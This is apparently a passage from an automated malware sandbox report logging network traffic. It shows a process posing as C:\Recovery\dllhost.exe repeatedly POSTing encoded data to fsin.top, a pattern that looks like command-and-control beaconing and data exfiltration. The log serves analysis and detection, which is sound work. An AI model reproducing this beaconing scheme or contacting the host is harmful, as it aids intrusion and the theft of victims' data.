                                                  Aug 1, 2024 07:38:46.246917009 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:46.599662066 CEST1012OUTData Raw: 51 50 58 55 5a 55 5d 56 5c 5e 5a 51 54 55 57 55 57 54 5e 59 56 59 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXUZU]V\^ZQTUWUWT^YVYQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[$":6>+&%?()\'(/2,"2(W/?!+_2&G#.X!(
                                                  Aug 1, 2024 07:38:46.691324949 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:46.842859030 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2%2FAMqjUur0jVra1xb%2BoEOlvdOZfPXLuQmv3muYC9ahQjw1NSsJAEH%2BediDuRsOt4tR0GxCoBOvTXUnIzw6h%2BHsokEIrUwNyac1YTFqyonvs3Z%2Ba1L2Bb309ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37be18d5f436d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  113192.168.2.449850172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:46.963857889 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:47.318399906 CEST1012OUTData Raw: 54 52 58 53 5a 5e 58 56 5c 5e 5a 51 54 5e 57 55 57 55 5e 5b 56 5b 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TRXSZ^XV\^ZQT^WUWU^[V[Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$"=^!]$+++!)62<%5&3S/6;$1&G#.X!
                                                  Aug 1, 2024 07:38:47.426919937 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:47.680135965 CEST580INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:47 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M4wGkB0Er24yWjyQo07hEwlik1A5yXP9s6DQQeZ1Al3BDR0Cr1%2ByV3FDW58sOkEptuoR8XD1mIptRKhEDAuI0W4rWI79UQb1K62dBsHdfScDL3YHHozHWzPLKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37be618f90cba-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  114192.168.2.449851172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:48.071274042 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:48.428015947 CEST1008OUTData Raw: 54 54 58 55 5a 5a 58 51 5c 5e 5a 51 54 56 57 5b 57 50 5e 5f 56 5b 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TTXUZZXQ\^ZQTVW[WP^_V[Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[01>!=4\35_?*)%%(?&/%3$;=?Y5/]%5&G#.X!
                                                  Aug 1, 2024 07:38:48.552845001 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:48.804177046 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lgbF3cCNoEbWoJ9OUNdRZqcYVx9wKb85bXGK3AkkGXBnr%2BOvSUFeXYbrOFUwWyTADz4aIJjYn0tNH0Ehh61%2FwLHoA14SfY4nVgPk792u58GH%2Bq8%2FDb6vDdyKmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bed28370f6f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  115192.168.2.449852172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:49.190155029 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:49.537230968 CEST1012OUTData Raw: 54 5e 5d 50 5f 5a 58 57 5c 5e 5a 51 54 52 57 52 57 50 5e 56 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^]P_ZXW\^ZQTRWRWP^VV^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!02%"+'?X<(!*%"X'+7Q%?620 S8=?\"(7%&G#.X!4
                                                  Aug 1, 2024 07:38:49.666701078 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:49.828634977 CEST596INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yO74L%2By7Lkdk2HXoLp4e2JpRYXTMTpENfFRVMi7qiWvB%2FMr4%2B52l3QAkYJJ4G47ET%2FxEjbsVCRuV%2BkZqs%2Bw%2FntchSC9rHyR3DB4Zi4ZmKQkvwLqQHE%2F%2Btk6jKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bf41e974378-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  116192.168.2.449853172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:49.966178894 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:50.318779945 CEST1012OUTData Raw: 51 57 5d 57 5f 58 5d 53 5c 5e 5a 51 54 52 57 52 57 57 5e 58 56 58 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QW]W_X]S\^ZQTRWRWW^XVXQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[%2)]!-$_+;=6^%'2<*X20,=8#(#%%&G#.X!4
                                                  Aug 1, 2024 07:38:50.425204039 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:50.671140909 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:50 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpSL2Uj7%2FIyU0YYuzwQgZHUtb%2BlEhiDY2QhgvRIDotcutVhi%2FY5g7X6dXWmj4%2FqrRuHOfYsdjUPQ2W7sa2zBxqhKTipsNuQHn10tLtO%2FXxH95Pl6smtlJtF02g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bf8d80d42c9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  117192.168.2.449854172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:50.823575020 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  118192.168.2.449855172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:50.842247963 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:51.193577051 CEST1284OUTData Raw: 54 53 5d 52 5f 5e 58 53 5c 5e 5a 51 54 53 57 51 57 5e 5e 5d 56 5d 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TS]R_^XS\^ZQTSWQW^^]V]Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'""#$& ?8!*!2+4%?1 8#!^?^15&G#.X!0
                                                  Aug 1, 2024 07:38:51.285062075 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:51.482547045 CEST737INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fz9WfzDRJVx%2BJQZhdfTxXdJ6PH4wgkq1qwB3Ent250MB3kSfyRBfn%2BnvZKU7KJ%2BiYdjXqt01hGY2BubQvsr2TD4Rw2a0GhWH22q9yfwgVGCgOnWu%2BPEinXIa%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bfe4f69c336-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 50 30 06 0c 51 22 39 20 52 3e 0c 22 0a 3d 0a 23 07 2a 29 05 15 27 3c 0f 13 31 38 3f 0d 22 12 25 5b 26 2c 32 51 31 1c 3e 5e 2a 37 21 51 04 11 25 02 20 20 26 14 2a 29 2c 00 25 38 2b 13 20 18 28 11 30 0d 26 08 20 39 2b 05 3f 32 29 1e 2b 31 2b 53 2e 15 24 01 3f 0d 24 58 32 26 2a 56 0d 17 22 1d 2d 5e 24 1c 30 0c 3b 08 23 05 38 0a 23 28 2e 04 29 06 2e 5d 2a 1d 2e 5b 2d 55 28 01 3d 23 3a 51 3f 03 25 13 3f 04 03 16 27 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"P0Q"9 R>"=#*)'<18?"%[&,2Q1>^*7!Q% &*),%8+ (0& 9+?2)+1+S.$?$X2&*V"-^$0;#8#(.).]*.[-U(=#:Q?%?'9"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  119192.168.2.449856172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:50.964005947 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:51.318464041 CEST1012OUTData Raw: 51 53 58 5c 5a 5a 5d 53 5c 5e 5a 51 54 54 57 50 57 51 5e 5a 56 5d 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSX\ZZ]S\^ZQTTWPWQ^ZV]QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y3T66-;0^+;%?691Q2&(W;=#!(/%%&G#.X!,
                                                  Aug 1, 2024 07:38:51.408632994 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:51.662854910 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N3f3IvHjPLvJkCqeGRs9TTsR4VgHfRV%2FVSN6GL8vdx8hymCsG5xoYBPj9D4D%2FdbbKED%2BbjNN5Xwdx5VCQUTv8PZ6psYEgHRXvYLggEbHwoXjsl9tYq%2F38vAB4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bff0dfa1889-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  120192.168.2.449857172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:51.794023037 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:52.146538973 CEST1012OUTData Raw: 54 57 5d 51 5a 5e 5d 56 5c 5e 5a 51 54 54 57 50 57 52 5e 57 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TW]QZ^]V\^ZQTTWPWR^WVYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'!&".<]3?">%^(&.Y%#?/>X5;(25&G#.X!,
                                                  Aug 1, 2024 07:38:52.238814116 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:52.490225077 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:52 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLdzPJ2isZN3sd5AQJnd7YEOLIgORRK8vIEK7IfAlIENF0Q4y9LOU0%2BHkzP7Wg5z7ZJnX1kXf%2BA51nKRIN5nlxfRSO3s7AXYQ4axgBZCN2ryiZO5WGKU9axE0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c043a4e8c30-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  121192.168.2.449858172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:52.635308981 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:52.990560055 CEST1008OUTData Raw: 54 51 58 51 5a 55 58 54 5c 5e 5a 51 54 56 57 52 57 50 5e 5e 56 5b 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXQZUXT\^ZQTVWRWP^^V[QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y0"(\&%?^(+U=C)2(,2/13/3X5^ 2&G#.X!
                                                  Aug 1, 2024 07:38:53.077451944 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:53.289967060 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:53.327148914 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJPfRHdWvcU%2B0pptyc3mgTeCYRrmjeTGvFC86hzj90LJvBQgGZ9QiXnCAiiAvuWWcqu4rHCd88n8JtunvzAeJySp78ikly5LlvG%2BMZiEzu%2FmNI9l24ctIIJTcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c097c460f79-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  122192.168.2.449859172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:53.462008953 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:53.818434000 CEST1012OUTData Raw: 54 50 58 56 5a 5e 5d 54 5c 5e 5a 51 54 54 57 5a 57 5f 5e 56 56 55 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXVZ^]T\^ZQTTWZW_^VVUQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$6!=\053Y?*5-1Q&%2;3\"+?\15&G#.X!,
                                                  Aug 1, 2024 07:38:53.939918995 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:54.154103994 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:54.182403088 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2FQsustmV67ufwd4vFHyzRSv1TuAr2NBi5fq%2BEXjigxiBAoM%2FlSk8JrLq9NwPTt6V%2Bswj5h8NiBNrVxpFnhJKsw5kyUzYKFm6JLF%2B5kM11sshKO0Ughl0ZCWVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c0ec8d38cc5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  123192.168.2.449860172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:54.309655905 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:54.663682938 CEST1012OUTData Raw: 51 50 5d 56 5a 58 58 51 5c 5e 5a 51 54 50 57 5b 57 51 5e 5a 56 5e 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]VZXXQ\^ZQTPW[WQ^ZV^Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^'6>+$&0(!>C&&P&Y6[208>";7%&G#.X!<
                                                  Aug 1, 2024 07:38:54.770133018 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:54.917979956 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
